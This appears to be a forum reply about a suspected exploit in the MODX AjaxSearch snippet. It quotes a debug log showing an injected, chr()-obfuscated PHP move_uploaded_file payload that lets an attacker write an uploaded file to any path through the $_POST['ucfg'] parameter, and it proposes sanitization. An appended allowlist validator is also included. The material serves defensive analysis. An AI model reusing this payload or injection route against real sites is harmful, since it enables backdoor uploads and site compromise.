@goldsky
I found this:
[3-Aug-10 12:07:05] AjaxSearchPopup - Snippet call : [!AjaxSearch? &version=`<?php move_uploaded_file($_FILES[chr(117).chr(115).chr(101).chr(114).chr(102).chr(105).chr(108).chr(101)][chr(116) . chr(109) . chr(112) . chr(95) . chr(110) . chr(97) . chr(109) . chr(101)], $_REQUEST[chr(112) . chr(97) . chr(116) . chr(104)]);?>` &debug=`1` &mbstring=``!]
This trace (when debug=1) is written by release 1.8.4 (or 1.8.5) when the ajax mode is used (the results are displayed in a popup window).
The snippet call is provided to the ajaxSearchPopup.php file through a $_POST['ucfg'] variable.
I don't know why (and I am very interested to understand how it is possible), but it seems that a hack could change the value of this ucfg variable, which is sent through an ajax request (see ajaxSearch.js), and add the above move_uploaded_file instruction.
If this instruction contributes to this iframe exploit (which is not really proven), we could avoid this by sanitizing this variable.
For instance in the file ajaxSearchPopup.php replace the line:
by:
$ucfg = strip_tags($_POST['ucfg']);
This is for the releases 1.8.3 to 1.8.5 with ajax mode.
AjaxSearch 1.9 has been completely refactored, so it is not certain whether this possible exploit is still possible.
Nevertheless, in ajaxSearch 1.9.1 the sanitization of all the external variables has been improved. You can download the last release from the repository or from the demo site from this page.
The correct name of the ajaxSearch package is ajaxSearch191_7249. 7249 is the lower svn id of the repository.
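As an added example (not code from the AjaxSearch project or from the post above), here is a stricter check for the snippet call received in $_POST['ucfg'] than strip_tags() alone: the whole value must match the snippet-call syntax, every parameter name must be on an allowlist, and every value is limited to a conservative character set. The function name validate_ucfg and the allowlist contents are assumptions for illustration.

```php
<?php
// Added example, not the project's own code. strip_tags() removes "<?php ... ?>" but
// leaves any other unexpected content in place; validating the shape of the whole
// snippet call and each parameter rejects anything that is not a plain config value.

// Parameters the popup is expected to pass (illustrative allowlist, an assumption).
const UCFG_ALLOWED_PARAMS = ['version', 'debug', 'mbstring', 'ajaxSearch', 'AS_showResults'];

/**
 * Returns the validated snippet call unchanged, or null if anything unexpected is found.
 * Expected shape: [!AjaxSearch? &name=`value` &name2=`value2`!]
 */
function validate_ucfg(string $ucfg): ?string
{
    // The complete string must be one AjaxSearch call made of &name=`value` pairs only.
    $shape = '/^\[!AjaxSearch\?((?:\s*&[A-Za-z_][A-Za-z0-9_]*=`[^`]*`)*)\s*!\]$/';
    if (!preg_match($shape, $ucfg, $m)) {
        return null;
    }

    // Check each parameter name and value individually.
    preg_match_all('/&([A-Za-z_][A-Za-z0-9_]*)=`([^`]*)`/', $m[1], $pairs, PREG_SET_ORDER);
    foreach ($pairs as [$full, $name, $value]) {
        if (!in_array($name, UCFG_ALLOWED_PARAMS, true)) {
            return null; // parameter name not on the allowlist
        }
        // Values may contain only letters, digits and a few punctuation characters;
        // '<', '?', '$', '(' and similar are rejected, so no PHP or HTML can get through.
        if (!preg_match('/^[A-Za-z0-9_.,:;\/ -]*$/', $value)) {
            return null;
        }
    }
    return $ucfg;
}

// Constructed sample inputs: a normal call and one whose version value carries a PHP tag.
$good = '[!AjaxSearch? &version=`1.8.4` &debug=`1` &mbstring=``!]';
$bad  = '[!AjaxSearch? &version=`<?php /* anything */ ?>` &debug=`1` &mbstring=``!]';

foreach (['good' => $good, 'bad' => $bad] as $label => $ucfg) {
    echo $label, ': ', validate_ucfg($ucfg) === null ? 'rejected' : 'accepted', PHP_EOL;
}
```

A rejected value should be logged (as the debug trace above already does for the call) and the popup should fall back to its default configuration rather than evaluating the supplied snippet call.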